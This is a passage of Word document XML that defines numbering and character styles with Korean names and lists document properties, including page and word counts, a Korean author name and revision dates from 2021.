  <w:style w:type="numbering" w:customStyle="1" w:styleId="2">
    <w:name w:val="스타일2"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E77BE2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="10">
    <w:name w:val="목록1"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00FA4C7E"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="제목 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FA4C7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A7E3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4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2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21</Pages>
  <Words>2714</Words>
  <Characters>15471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배정훈</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>배정훈</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-19T11:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-23T18:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>